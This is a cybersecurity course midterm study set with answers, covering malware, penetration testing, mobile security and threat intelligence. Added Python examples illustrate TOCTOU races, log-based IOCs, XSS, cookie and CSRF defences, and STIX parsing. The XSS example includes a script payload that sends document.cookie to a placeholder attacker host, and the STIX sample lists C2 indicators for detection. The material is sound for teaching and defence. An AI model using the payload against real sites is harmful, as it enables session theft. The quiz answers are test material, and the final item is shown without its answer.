MIS585 Midterm (Ch. 1-5)
Which model uses a sequential design process?
Waterfall model
Which of the following is technology that imitates human abilities? a. AI b. ML c. RC d. XLS
a. AI
What are the two limitations of private information sharing centers? a. Access to data and participation b. Government approval and cost c. Timing of reports and remote access d. Bandwidth and CPU
a. Access to data and participation
Agape has been asked to experiment with different hardware to create a controller for a new device on the factory floor. She needs a credit-card-sized motherboard that has a microcontroller instead of a microprocessor. Which would be the best solution? a. Arduino b. Raspberry Pi c. SoC d. FPGA
a. Arduino
Which of the following is NOT a characteristic of a penetration test? a. Automated b. Finds deep vulnerabilities c. Performed occasionally d. May use internal employees or external consultants
a. Automated
Oskar has been receiving emails about critical threat intelligence information from a public information sharing center. His team leader has asked him to look into how the process can be automated so that the information can feed directly into the team's technology security. What technology will Oskar recommend? a. Automated Indicator Sharing (AIS) b. Bidirectional Security Protocol (BSP) c. Linefeed Access d. Lightwire JSON Control
a. Automated Indicator Sharing (AIS)
Which type of malware relies on LOLBins? a. PUP b. File-based virus c. Fileless virus d. Bot
c. Fileless virus
Which of the following is NOT a characteristic of malware? a. Deceive b. Launch c. Imprison d. Diffusion
d. Diffusion
Which of the following is not true regarding security? a. Security is a goal. b. Security includes the necessary steps to protect from harm. c. Security is a process. d. Security is a war that must be won at all costs.
d. Security is a war that must be won at all costs.
Which of the following groups use advanced persistent threats? a. Brokers b. Criminal syndicates c. Shadow IT d. State actors
d. State actors
Which of the following is NOT an improvement of UEFI over BIOS? a. Stronger boot security b. Networking functionality in UEFI c. Access larger hard drives d. Support of USB 3.0
d. Support of USB 3.0
Lykke's supervisor is evaluating whether to use internal security employees to conduct a penetration test. Lykke does not consider this a good idea and has created a memo with several reasons they should not be used. Which of the following would NOT be part of that memo? a. The employees could have inside knowledge of the network that would give them an advantage. b. There may be a lack of expertise. c. Employees may have a reluctance to reveal a vulnerability. d. They would have to stay overnight to perform the test.
d. They would have to stay overnight to perform the test.
What race condition can result in a NULL pointer/ object dereference? a. Conflict race condition b. Value-based race condition c. Thread race condition d. Time of check/time of use race condition
d. Time of check/time of use race condition
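Worked example for this item (added here; not from the textbook or the quiz author): a time-of-check/time-of-use race where a shared reference is checked for None and then re-read after the window, so a concurrent "logout" turns the use into a None dereference (in C this is the NULL pointer dereference the question refers to). The Session and Token classes and the `between` hook are constructed so the race reproduces deterministically rather than depending on thread scheduling.

```python
"""TOCTOU race that ends in a None (NULL) dereference, and the fix.

Added example for this quiz item; it is not from the textbook. The Session
holder, Token class and the 'between' hook are constructed so the race
reproduces deterministically instead of depending on thread scheduling.
"""
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class Token:
    subject: str


class Session:
    """Shared state: a concurrent logout may set .token to None at any moment."""

    def __init__(self, token: Optional[Token]) -> None:
        self.token = token


# In a real program the window between the check and the use is a thread
# switch; here a hook runs inside that window so the race happens every time.
Interleave = Callable[[Session], None]


def logout(session: Session) -> None:
    """The concurrent writer: clears the token (simulates another thread)."""
    session.token = None


def no_op(session: Session) -> None:
    pass


def subject_racy(session: Session, between: Interleave = no_op) -> Optional[str]:
    """Vulnerable: re-reads session.token after the check, so the check is stale."""
    if session.token is None:            # time of check
        return None
    between(session)                     # window: logout() sets token to None
    return session.token.subject         # time of use: AttributeError (NULL deref in C)


def subject_safe(session: Session, between: Interleave = no_op) -> Optional[str]:
    """Hardened: read the shared reference once; check and use the same object."""
    token = session.token                # single read of the shared field
    if token is None:
        return None
    between(session)                     # a concurrent logout no longer matters
    return token.subject


def racy_crashes() -> bool:
    """True if the vulnerable path blows up when a logout lands in the window."""
    try:
        subject_racy(Session(Token("alice")), logout)
    except AttributeError:
        return True
    return False


if __name__ == "__main__":
    print("racy, no race:  ", subject_racy(Session(Token("alice"))))
    print("racy, with race:", "crash" if racy_crashes() else "ok")
    print("safe, with race:", subject_safe(Session(Token("alice")), logout))
```

The same rule fixes the filesystem form of TOCTOU: instead of checking a path with one call and opening it with another, open it once and validate the descriptor you actually use (for example with fstat on the returned fd).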
Which of these is a list of preapproved applications? a. Greenlist b. Redlist c. Blacklist d. Whitelist
d. Whitelist (now more commonly called an allow list)
Complete this definition of information security: That which protects the integrity, confidentiality, and availability of information _________________. a. on electronic digital devices and limited analog devices that can connect via the Internet or through a local area network. b. through a long-term process that results in ultimate security. c. using both open-sourced as well as supplier-sourced hardware and software that interacts appropriately with limited resources. d. through products, people, and procedures on the devices that store, manipulate, and transmit the information.
d. through products, people, and procedures on the devices that store, manipulate, and transmit the information.
Which of the following is NOT a context-aware authentication? a. On-body detection b. Trusted places c. Trusted devices d. Trusted contacts
d. Trusted contacts
What penetration testing level name is given to testers who have no knowledge of the network and no special privileges? a. Black box b. Gray box c. White box d. Purple box
a. Black box
Which group is responsible for the Cloud Controls Matrix? a. CSA b. CIS c. OSINT d. NIST
a. CSA
In her job interview, Xiu asks about the company policy regarding smartphones. She is told that employees may choose from a limited list of approved devices but that she must pay for the device herself; however, the company will provide her with a monthly stipend. Which type of enterprise deployment model does this company support? a. CYOD b. COPE c. BYOD d. Corporate owned
a. CYOD
What type of analysis is heuristic monitoring based on? a. Dynamic analysis b. Static analysis c. Code analysis d. Input analysis
a. Dynamic analysis
Which of the following is FALSE about a quarantine process? a. It holds a suspicious application until the user gives approval. b. It can send a sanitized version of the attachment. c. It can send a URL to the document that is on a restricted computer. d. It is most often used with email attachments.
a. It holds a suspicious application until the user gives approval.
Josh is researching the different types of attacks that can be generated through a botnet. Which of the following would NOT be something distributed by a botnet? a. LOLBins b. Spam c. Malware d. Ad fraud
a. LOLBins
What does Windows 10 Tamper Protection do? a. Limits access to the registry. b. Prevents any updates to the registry until the user approves the update. c. Compresses and locks the registry. d. Creates a secure backup copy of the registry.
a. Limits access to the registry. (More precisely, Tamper Protection blocks changes to Microsoft Defender settings made outside the Windows Security app or management tooling, whether attempted through the registry, PowerShell, or Group Policy.)
Which tool manages the distribution and control of apps? a. MAM b. MDM c. MCM d. MFM
a. MAM
What allows a device to be managed remotely? a. Mobile device management (MDM) b. Mobile application management (MAM) c. Mobile resource management (MRM) d. Mobile wrapper management (MWM)
a. Mobile device management (MDM)
Which of the following manipulates the trusting relationship between web servers? a. SSRF b. CSRF c. EXMAL d. SCSI
a. SSRF
Which of the following is not a general information source that can provide valuable in-depth information on cybersecurity? a. Twitter b. Conferences c. Local industry groups d. Vendor websites
a. Twitter
What is the difference between a Trojan and a RAT? a. There is no difference. b. A RAT gives the attacker unauthorized remote access to the victim's computer. c. A Trojan can carry malware while a RAT cannot. d. A RAT can infect only a smartphone and not a computer.
b. A RAT gives the attacker unauthorized remote access to the victim's computer.
What is another name for footprinting? a. High-level reconnaissance b. Active reconnaissance c. Modeling d. Revealing
b. Active reconnaissance
What word is the currently accepted term to refer to network-connected hardware devices? a. Host b. Endpoint c. Device d. Client
b. Endpoint
Which of the following tries to detect and stop an attack? a. HIDS b. HIPS c. RDE d. SOMA
b. HIPS
Which type of OS is typically found on an embedded system? a. SoC b. RTOS c. OTG d. COPE
b. RTOS
Which of the following can automate an incident response? a. SIEM b. SOAR c. CVCC d. SOSIA
b. SOAR
What prevents a mobile device from being used until the user enters the correct passcode? a. Swipe identifier (SW-ID) b. Screen lock c. Screen timeout d. Touch swipe
b. Screen lock
Which premise is the foundation of threat hunting? a. Cybercrime will only increase. b. Threat actors have already infiltrated our network. c. Attacks are becoming more difficult. d. Pivoting is more difficult to detect than ever before.
b. Threat actors have already infiltrated our network.
Which of the following attacks targets the external software component that is a repository of both code and data? a. Application program interface (API) attack b. Device driver manipulation attack c. Dynamic-link library (DLL) injection attack d. OS REG attack
c. Dynamic-link library (DLL) injection attack
Which of the following is NOT a means by which a bot communicates with a C&C device? a. Signing into a website the bot herder operates b. Signing in to a third-party website c. Email d. Command sent through Twitter posts
c. Email
Which of the following is not used to describe those who attack computer systems? a. Threat actor b. Hacker c. Malicious agent d. Attacker
c. Malicious agent
Which of the following is not a recognized attack vector? a. Supply chain b. Social media c. On-prem d. Email
c. On-prem
Randall's roommate is complaining to him about all of the software that came pre-installed on his new computer. He doesn't want the software because it slows down the computer. What type of software is this? a. Spyware b. BOT c. PUP d. Keylogger
c. PUP
Which information-sharing marking scheme uses four colors to indicate the expected sharing limitations that are to be applied by recipients of the information? a. CISA b. FOIA c. TLP d. PCII
c. TLP (Traffic Light Protocol; the four labels in the textbook's version are RED, AMBER, GREEN, and WHITE. TLP 2.0, published in 2022, renamed WHITE to CLEAR and added AMBER+STRICT.)
What is an objective of state-sponsored attackers? a. To right a perceived wrong b. To amass fortune over of fame c. To spy on citizens d. To sell vulnerabilities to the highest bidder
c. To spy on citizens
Which of the following is NOT something that a SIEM can perform? a. User behavior analysis b. Sentiment analysis c. Log aggregation d. Incident response
d. Incident response
What does containerization do? a. It splits operating system functions only on specific brands of mobile devices. b. It places all keys in a special vault. c. It slows down a mobile device to half speed. d. It separates personal data from corporate data.
d. It separates personal data from corporate data.
An IOC occurs when which metric exceeds its normal bounds? a. IRR b. LRG c. EXR d. KRI
d. KRI
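Worked example for this item (added here; not from the textbook or the quiz author): a key risk indicator computed over authentication log lines, with an IOC raised when the indicator exceeds its normal bound. The log lines are constructed (RFC 5737 addresses), and the indicator name "failed logins per source IP per minute" and the baseline of 5 are assumptions chosen for illustration.

```python
"""KRI check over constructed authentication log lines.

Added example, not from the quiz or its textbook. The sshd-style log format
is synthetic, and the baseline (5 failures per source per minute) is assumed.
"""
import re
from collections import Counter
from datetime import datetime

# Constructed sample log (not from any real system). One source hammers the
# host with six failures inside one minute; another source fails twice, slowly.
SAMPLE_LOG = """\
2024-03-04T09:00:02 host1 sshd[411]: Failed password for root from 203.0.113.9 port 52110 ssh2
2024-03-04T09:00:03 host1 sshd[411]: Failed password for admin from 203.0.113.9 port 52112 ssh2
2024-03-04T09:00:05 host1 sshd[412]: Accepted password for alice from 192.0.2.20 port 40100 ssh2
2024-03-04T09:00:07 host1 sshd[413]: Failed password for root from 203.0.113.9 port 52114 ssh2
2024-03-04T09:00:09 host1 sshd[414]: Failed password for oracle from 203.0.113.9 port 52116 ssh2
2024-03-04T09:00:10 host1 sshd[415]: Failed password for invalid user test from 203.0.113.9 port 52118 ssh2
2024-03-04T09:00:12 host1 sshd[416]: Failed password for root from 203.0.113.9 port 52120 ssh2
2024-03-04T09:00:40 host1 sshd[417]: Failed password for bob from 198.51.100.4 port 33001 ssh2
2024-03-04T09:01:15 host1 sshd[418]: Failed password for bob from 198.51.100.4 port 33002 ssh2
2024-03-04T09:01:30 host1 sshd[419]: Accepted publickey for bob from 198.51.100.4 port 33003 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) \S+ for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse(log_text):
    """Turn raw lines into events; lines that do not parse are dropped, not guessed."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "failed": m["result"] == "Failed",
            "user": m["user"],
            "src": m["src"],
        })
    return events


def failed_logins_per_minute(events):
    """The KRI: failed logins bucketed by (source IP, minute)."""
    counts = Counter()
    for e in events:
        if e["failed"]:
            bucket = e["ts"].replace(second=0, microsecond=0)
            counts[(e["src"], bucket)] += 1
    return counts


def indicators_of_compromise(events, threshold=5):
    """IOCs: every (source, minute) whose KRI exceeds the normal bound."""
    kri = failed_logins_per_minute(events)
    iocs = [
        {"src": src, "minute": minute.isoformat(), "failed": n}
        for (src, minute), n in kri.items()
        if n > threshold
    ]
    return sorted(iocs, key=lambda d: (d["minute"], d["src"]))


if __name__ == "__main__":
    for ioc in indicators_of_compromise(parse(SAMPLE_LOG)):
        print(f"IOC: {ioc['failed']} failed logins from {ioc['src']} in minute {ioc['minute']}")
```

In a SIEM the same logic is an aggregation plus a threshold rule; the bound itself should come from an observed baseline for the environment rather than a fixed number.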
When researching how an attack recently took place, Nova discovered that the threat actor, after penetrating the system, started looking to move through the network with their elevated position. What is the name of this technique? a. Jumping b. Twirling c. Squaring up d. Lateral movement
d. Lateral movement
Which boot security mode sends information on the boot process to a remote server? a. UEFI Native Mode b. Secure Boot c. Trusted Boot d. Measured Boot
d. Measured Boot
Which of these is considered the strongest type of passcode to use on a mobile device? a. Password b. PIN c. Fingerprint swipe d. Draw connecting dots pattern
a. Password
Banko's sister has just downloaded and installed an app that allows her to circumvent the built-in limitations on her Android smartphone. What is this called? a. Rooting b. Sideloading c. Jailbreaking d. Ducking
a. Rooting
Tuva's supervisor wants to share a recent audit outside the organization. Tuva warns him that this type of audit can only be read by those within the organization. What audit does Tuva's supervisor want to distribute? a. SSAE SOC 2 Type II b. SSAE SOC 2 Type III c. SSAE SOC 3 Type IV d. SSAE SOC 3.2 Type X
a. SSAE SOC 2 Type II
Tilde is working on a contract with the external penetration testing consultants. She does not want any executives to receive spear-phishing emails. Which rule of engagement would cover this limitation? a. Scope b. Exploitation c. Targets d. Limitations and exclusions
a. Scope
Which of the following groups have the lowest level of technical knowledge? a. Script kiddies b. Hacktivists c. State actors d. Insiders
a. Script kiddies
Which of the following is true regarding the relationship between security and convenience? a. Security and convenience are inversely proportional. b. Security and convenience have no relationship. c. Security is less important than convenience. d. Security and convenience are equal in importance.
a. Security and convenience are inversely proportional.
Which of the following is false about the CompTIA Security+ certification? a. Security+ is one of the most widely acclaimed security certifications. b. Security+ is internationally recognized as validating a foundation level of security skills and knowledge. c. The Security+ certification is a vendor-neutral credential. d. Professionals who hold the Security+ certification earn about the same or slightly less than security professionals who have not achieved this certification.
d. Professionals who hold the Security+ certification earn about the same or slightly less than security professionals who have not achieved this certification.
Which of these would NOT be considered the result of a logic bomb? a. Send an email to Rowan's inbox each Monday morning with the agenda of that week's department meeting. b. If the company's stock price drops below $50, then credit Oscar's retirement account with one additional year of retirement credit. c. Erase the hard drives of all the servers 90 days after Alfredo's name is removed from the list of current employees. d. Delete all human resource records regarding Augustine one month after he leaves the company.
a. Send an email to Rowan's inbox each Monday morning with the agenda of that week's department meeting.
What is the term used to describe the connectivity between an organization and a third party? a. System integration b. Platform support c. Resource migration d. Network layering
a. System integration
Gabriel's sister called him about a message that suddenly appeared on her screen that says her software license has expired and she must immediately pay $500 to have it renewed before control of the computer will be returned to her. What type of malware has infected her computer? a. Persistent lockware b. Blocking ransomware c. Cryptomalware d. Impede-ware
b. Blocking ransomware
Marius's team leader has just texted him that an employee, who violated company policy by bringing in a file on her USB flash drive, has just reported that her computer is suddenly locked up with cryptomalware. Why would Marius consider this a dangerous situation? a. It sets a precedent by encouraging other employees to violate company policy. b. Cryptomalware can encrypt all files on any network that is connected to the employee's computer. c. The organization may be forced to pay up to $500 for the ransom. d. The employee would have to wait at least an hour before her computer could be restored.
b. Cryptomalware can encrypt all files on any network that is connected to the employee's computer.
Luka has been asked by his supervisor to monitor the dark web for any IOCs concerning their organization. The next week, Luka reports that he was unable to find anything because looking for information on the dark web is different from using the regular web. Which of the following is FALSE about looking for information on the dark web? a. It is necessary to use Tor or I2P. b. Dark web search engines are identical to regular search engines. c. Dark web merchants open and close their sites without warning. d. The naming structure is different on the dark web.
b. Dark web search engines are identical to regular search engines.
Luna is reading a book about the history of cybercrime. She read that the very first cyberattacks were mainly for what purpose? a. Fortune b. Fame c. Financial gain d. Personal security
b. Fame
What enforces the location in which an app can function by tracking the location of the mobile device? a. Location resource management b. Geofencing c. GPS tagging d. Graphical Management Tracking (GMT)
b. Geofencing
What is the process of identifying the geographical location of a mobile device? a. Geotracking b. Geolocation c. GeoID d. Geomonitoring
b. Geolocation
Which ISO contains controls for managing and controlling risk? a. ISO XRS b. ISO 31000 c. ISO 271101 d. ISO 27555
b. ISO 31000
Which of the following of the CIA Triad ensures that information is correct, and no unauthorized person has altered it? a. Confidentiality b. Integrity c. Availability d. Assurance
b. Integrity
What is the advantage of a secure cookie? a. It cannot be stored on the local computer without the user's express permission. b. It is sent to the server over HTTPS. c. It is analyzed by AV before it is transmitted. d. It only exists in RAM and is deleted once the web browser is closed.
b. It is sent to the server over HTTPS.
Which of these is NOT a security feature for locating a lost or stolen mobile device? a. Remote lockout b. Last known good configuration c. Alarm d. Thief picture
b. Last known good configuration
Which of the following is NOT an advantage of crowdsourced penetration testing? a. Faster testing b. Less expensive c. Ability to rotate teams d. Conducting multiple tests simultaneously
b. Less expensive
What are the two concerns about using public information sharing centers? a. Cost and availability b. Privacy and speed c. Security and privacy d. Regulatory approval and sharing
b. Privacy and speed
Which type of hacker will probe a system for weaknesses and then privately provide that information back to the organization? a. Black hat hackers b. White hat hackers c. Gray hat hackers d. Red hat hackers
b. White hat hackers
Which of the following is known as a network virus? a. TAR b. Worm c. Remote exploitation virus (REV) d. C&C
b. Worm
Which of the following attacks is based on a website accepting user input without sanitizing it? a. RSS b. XSS c. SQLS d. SSXRS
b. XSS
Which tool is most commonly associated with state actors? a. Closed-Source Resistant and Recurrent Malware (CSRRM) b. advanced persistent threat (APT) c. Unlimited Harvest and Secure Attack (UHSA) d. Network Spider and Worm Threat (NSAWT)
b. advanced persistent threat (APT)
Hisoka is creating a summary document for new employees about their options for different mobile devices. One part of his report covers encryption. What would Hisoka NOT include in his document? a. All modern versions of mobile device OS encrypt all user data by default. b. Encryption occurs when the mobile device is locked. c. Apple uses file-based encryption to offer a higher level of security. d. Data backed up to an Apple or Google server could be unlocked by a court order.
c. Apple uses file-based encryption to offer a higher level of security.
Which of the following ensures that only authorized parties can view protected information? a. Authorization b. Confidentiality c. Availability d. Integrity
b. Confidentiality
What is the category of threat actors that sell their knowledge of vulnerabilities to other attackers or governments? a. Cyberterrorists b. Competitors c. Brokers d. Resource managers
c. Brokers
Which of the following attacks is based on the principle that when a user is currently authenticated on a website and then loads another webpage, the new page inherits the identity and privileges of the first website? a. SSFR b. DLLS c. CSRF d. DRCR
c. CSRF
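Worked example covering three of the web items above (added here; not from the textbook or the quiz author): the XSS item (unsanitized input reflected into a page), the secure cookie item (Secure, plus the HttpOnly and SameSite attributes that blunt XSS cookie theft and CSRF), and the CSRF item (a token bound to the session so a page on another site cannot forge the request). No web framework is used so it runs stand-alone; the function names, the reflected payload and the secret key are constructed for illustration, and the HMAC-of-session-id token is a simplified session-bound scheme rather than any particular framework's implementation.

```python
"""XSS, cookie attributes and an anti-CSRF token check, side by side.

Added example, not from the quiz or its textbook. Names, payload and the
secret key below are constructed placeholders.
"""
import hashlib
import hmac
import html

# --- XSS: a page that reflects user input ----------------------------------
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates raw input into HTML: the payload becomes executable script."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Escapes <, >, &, and quotes so the browser renders text, not a tag."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# --- Secure cookie -----------------------------------------------------------
def build_set_cookie(name: str, value: str, max_age: int = 3600) -> str:
    """Session cookie sent only over HTTPS, invisible to script, not sent cross-site."""
    return (f"{name}={value}; Path=/; Max-Age={max_age}; "
            "Secure; HttpOnly; SameSite=Strict")


def cookie_attributes(set_cookie: str) -> dict:
    """Parse a Set-Cookie header into its security flags (useful as a config check)."""
    parts = [p.strip() for p in set_cookie.split(";")]
    attrs = {"secure": False, "httponly": False, "samesite": None}
    for part in parts[1:]:                  # parts[0] is name=value
        key, _, val = part.partition("=")
        key = key.lower()
        if key == "secure":
            attrs["secure"] = True
        elif key == "httponly":
            attrs["httponly"] = True
        elif key == "samesite":
            attrs["samesite"] = val or None
    return attrs


# --- CSRF token --------------------------------------------------------------
SECRET_KEY = b"constructed-demo-key-not-for-production"   # assumption: server secret


def issue_csrf_token(session_id: str) -> str:
    """Bind the token to the session so an attacker's page cannot mint one."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, submitted: str) -> bool:
    """Recompute for the caller's session and compare in constant time."""
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, submitted)


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(build_set_cookie("sid", "abc123"))
    tok = issue_csrf_token("sess-1")
    print("same session:", verify_csrf_token("sess-1", tok),
          "other session:", verify_csrf_token("sess-2", tok))
```

Note how the three controls interlock: escaping stops the script from running, HttpOnly keeps the cookie out of reach if a script does run, SameSite stops the browser attaching the cookie to a cross-site request, and the token stops a forged request that somehow arrives with the cookie anyway.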
Ebba has received a new initiative for her security team to perform an in-house penetration test. What is the first step that Ebba should undertake? a. Approval b. Budgeting c. Planning d. Documentation
c. Planning
Which of these is used to send SMS text messages to selected users or groups of users? a. Pull notification services b. Replay notification distribution (RND) c. Push notification services d. MAM mass SMS
c. Push notification services
What term refers to changing the design of existing code? a. Library manipulation b. Shimming c. Refactoring d. Design driver manipulation
c. Refactoring
Which of the following are developed by established professional organizations or government agencies using the expertise of seasoned security professionals? a. Legislation b. White papers c. Regulations d. Benchmarks
d. Benchmarks (secure configuration guides such as the CIS Benchmarks)
Which is the final rule of engagement that would be conducted in a pen test? a. Cleanup b. Communication c. Reporting d. Exploitation
c. Reporting
Which statement regarding a keylogger is NOT true? a. Software keyloggers can be designed to send captured information automatically back to the attacker through the Internet. b. Hardware keyloggers are installed between the keyboard connector and computer keyboard USB port. c. Software keyloggers are generally easy to detect. d. Keyloggers can be used to capture passwords, credit card numbers, or personal information.
c. Software keyloggers are generally easy to detect.
Which stage conducts a test that will verify the code functions as intended? a. Production stage b. Testing stage c. Staging stage d. Development stage
c. Staging stage
Which of the following is an application protocol for exchanging cyberthreat intelligence over HTTPS? a. STIX b. AIP-TAR c. TAXII d. TCP-Over-Secure (ToP)
c. TAXII
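Worked example for the STIX/TAXII and AIS items (added here; not from the textbook or the quiz author): pulling machine-readable indicators out of a STIX 2.1 bundle of the kind a TAXII collection returns, the step that lets shared threat intelligence feed directly into blocking or detection. The bundle is constructed (RFC 5737 addresses, an example domain, a placeholder hash), and the extractor deliberately handles only simple single-comparison STIX patterns, reporting anything it skips rather than guessing.

```python
"""Extract IOCs from a STIX 2.1 bundle as fetched from a TAXII collection.

Added example, not from the quiz or its textbook. The bundle is constructed;
only single-comparison STIX patterns are parsed, and revoked, expired or
non-indicator objects are reported in 'skipped'.
"""
import json
import re
from datetime import datetime, timezone
from typing import Optional

BUNDLE_JSON = r'''
{
  "type": "bundle",
  "id": "bundle--7d5c3a9e-0b1f-4f7a-9a1e-3b2c1d0e9f88",
  "objects": [
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--1a2b3c4d-0000-4000-8000-000000000001",
     "created": "2024-03-01T12:00:00.000Z", "modified": "2024-03-01T12:00:00.000Z",
     "name": "C2 address", "pattern_type": "stix", "valid_from": "2024-03-01T12:00:00Z",
     "pattern": "[ipv4-addr:value = '203.0.113.77']"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--1a2b3c4d-0000-4000-8000-000000000002",
     "created": "2024-03-01T12:00:00.000Z", "modified": "2024-03-01T12:00:00.000Z",
     "name": "C2 domain", "pattern_type": "stix", "valid_from": "2024-03-01T12:00:00Z",
     "pattern": "[domain-name:value = 'c2.attacker.example']"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--1a2b3c4d-0000-4000-8000-000000000003",
     "created": "2024-03-01T12:00:00.000Z", "modified": "2024-03-01T12:00:00.000Z",
     "name": "Dropper hash", "pattern_type": "stix", "valid_from": "2024-03-01T12:00:00Z",
     "pattern": "[file:hashes.'SHA-256' = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--1a2b3c4d-0000-4000-8000-000000000004",
     "created": "2023-01-01T00:00:00.000Z", "modified": "2023-01-01T00:00:00.000Z",
     "name": "Old scanner", "pattern_type": "stix", "valid_from": "2023-01-01T00:00:00Z",
     "valid_until": "2023-06-01T00:00:00Z",
     "pattern": "[ipv4-addr:value = '198.51.100.200']"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--1a2b3c4d-0000-4000-8000-000000000005",
     "created": "2024-02-01T00:00:00.000Z", "modified": "2024-02-15T00:00:00.000Z",
     "revoked": true, "name": "False positive", "pattern_type": "stix",
     "valid_from": "2024-02-01T00:00:00Z", "pattern": "[ipv4-addr:value = '192.0.2.99']"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--1a2b3c4d-0000-4000-8000-000000000006",
     "created": "2024-03-01T12:00:00.000Z", "modified": "2024-03-01T12:00:00.000Z",
     "name": "Beacon traffic", "pattern_type": "stix", "valid_from": "2024-03-01T12:00:00Z",
     "pattern": "[network-traffic:dst_port = 4444 AND network-traffic:protocols[*] = 'tcp']"},
    {"type": "malware", "spec_version": "2.1", "is_family": false,
     "id": "malware--1a2b3c4d-0000-4000-8000-0000000000aa",
     "created": "2024-03-01T12:00:00.000Z", "modified": "2024-03-01T12:00:00.000Z",
     "name": "ExampleDropper"}
  ]
}
'''

# One observable, one property, one quoted value, e.g. [ipv4-addr:value = '1.2.3.4']
PATTERN_RE = re.compile(
    r"^\[(?P<otype>[a-z0-9-]+):(?P<prop>[A-Za-z0-9_.'-]+)\s*=\s*'(?P<value>[^']*)'\]$"
)


def _parse_ts(ts: str) -> datetime:
    """STIX timestamps end in 'Z'; fromisoformat before 3.11 needs an offset."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def extract_iocs(bundle_json: str, now: Optional[str] = None) -> dict:
    """Return {'iocs': [...], 'skipped': [(id, reason), ...]} for a STIX bundle."""
    bundle = json.loads(bundle_json)
    now_dt = _parse_ts(now) if now else datetime.now(timezone.utc)
    iocs, skipped = [], []
    for obj in bundle.get("objects", []):
        oid = obj.get("id", "<no id>")
        if obj.get("type") != "indicator":
            skipped.append((oid, "not an indicator"))
            continue
        if obj.get("revoked"):
            skipped.append((oid, "revoked"))
            continue
        if obj.get("pattern_type", "stix") != "stix":
            skipped.append((oid, "non-STIX pattern language"))
            continue
        until = obj.get("valid_until")
        if until and _parse_ts(until) <= now_dt:
            skipped.append((oid, "expired"))
            continue
        m = PATTERN_RE.match(obj.get("pattern", "").strip())
        if not m:
            skipped.append((oid, "compound pattern not handled by this extractor"))
            continue
        iocs.append({"id": oid, "type": m["otype"],
                     "prop": m["prop"].replace("'", ""), "value": m["value"]})
    return {"iocs": iocs, "skipped": skipped}


def blocklist(iocs, otype: str):
    """Values of one observable type, e.g. every ipv4-addr, ready for a firewall list."""
    return sorted(i["value"] for i in iocs if i["type"] == otype)


if __name__ == "__main__":
    result = extract_iocs(BUNDLE_JSON, now="2024-03-15T00:00:00Z")
    print("block these IPv4 addresses:", blocklist(result["iocs"], "ipv4-addr"))
    for oid, reason in result["skipped"]:
        print("skipped", oid, "->", reason)
```

In practice the bundle comes from a TAXII 2.1 server's objects endpoint over HTTPS, and the skipped list is what an analyst reviews: compound patterns need a proper STIX pattern evaluator, not a regular expression.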
Which of the following is NOT a limitation of a threat map? a. Many maps claim that they show data in real time, but most are simply a playback of previous attacks. b. Because threat maps show anonymized data, it is impossible to know the identity of the attackers or the victims. c. They can be difficult to visualize. d. Threat actors usually mask their real locations, so what is displayed on a threat map is incorrect.
c. They can be difficult to visualize.
How do vendors decide which should be the default settings on a system? a. Those that are the most secure are always the default settings. b. There is no reason specific default settings are chosen. c. Those settings that provide the means by which the user can immediately begin to use the product. d. The default settings are always mandated by industry standards.
c. Those settings that provide the means by which the user can immediately begin to use the product.
Hakaku needs a tool with a single management interface that provides capabilities for managing and securing mobile devices, applications, and content. Which tool would be the best solution? a. MCCM b. MDM c. UEM d. MMAM
c. UEM
Enki received a request by a technician for a new subnotebook computer. The technician noted that he wanted USB OTG support and asked Enki's advice regarding it. Which of the following would Enki NOT tell him? a. A device connected via USB OTG can function as a peripheral for external media access. b. A device connected via USB OTG can function as a host. c. USB OTG is only available for connecting Android devices to a subnotebook. d. Connecting a mobile device to an infected computer using USB OTG could allow malware to be sent to that device.
c. USB OTG is only available for connecting Android devices to a subnotebook.
Which of the following is NOT an advantage of an automated patch update service? a. Downloading patches from a local server instead of using the vendor's online update service can save bandwidth and time because each computer does not have to connect to an external server. b. Administrators can approve updates for "detection" only; this allows them to see which computers require the update without installing it. c. Users can disable or circumvent updates just as they can if their computer is configured to use the vendor's online update service. d. Administrators can approve or decline updates for client systems, force updates to install by a specific date, and obtain reports on what updates each computer needs.
c. Users can disable or circumvent updates just as they can if their computer is configured to use the vendor's online update service.
Aoi has been asked to provide research regarding adding a new class of Android smartphones to a list of approved devices. One of the considerations is how frequently the smartphones receive firmware OTA updates. Which of the following reasons would Aoi NOT list in her report as a factor in the frequency of Android firmware OTA updates? a. OEMs are hesitant to distribute Google updates because it limits their ability to differentiate themselves from competitors if all versions of Android start to look the same through updates. b. Because many of the OEMs have modified Android, they are reluctant to distribute updates that could potentially conflict with their changes. c. Wireless carriers are reluctant to provide firmware OTA updates because of the bandwidth the updates consume on their wireless networks. d. Because OEMs want to sell as many devices as possible, they have no financial incentive to update mobile devices that users would then continue to use indefinitely.
c. Wireless carriers are reluctant to provide firmware OTA updates because of the bandwidth the updates consume on their wireless networks.
Akira is explaining to his team members the security constraints that have made it a challenge for protecting a new embedded system. Which of the following would Akira NOT include as a constraint? a. Authentication b. Cost c. Power d. Availability
d. Availability
Which type of memory vulnerability attack manipulates the "return address" of the memory location of a software program? a. Shim overflow attack b. Factor overflow attack c. Integer overflow attack d. Buffer overflow attack
d. Buffer overflow attack
Which of the following is not a reason a legacy platform has not been updated? a. Limited hardware capacity b. An application only operates on a specific OS version c. Neglect d. No compelling reason for any updates
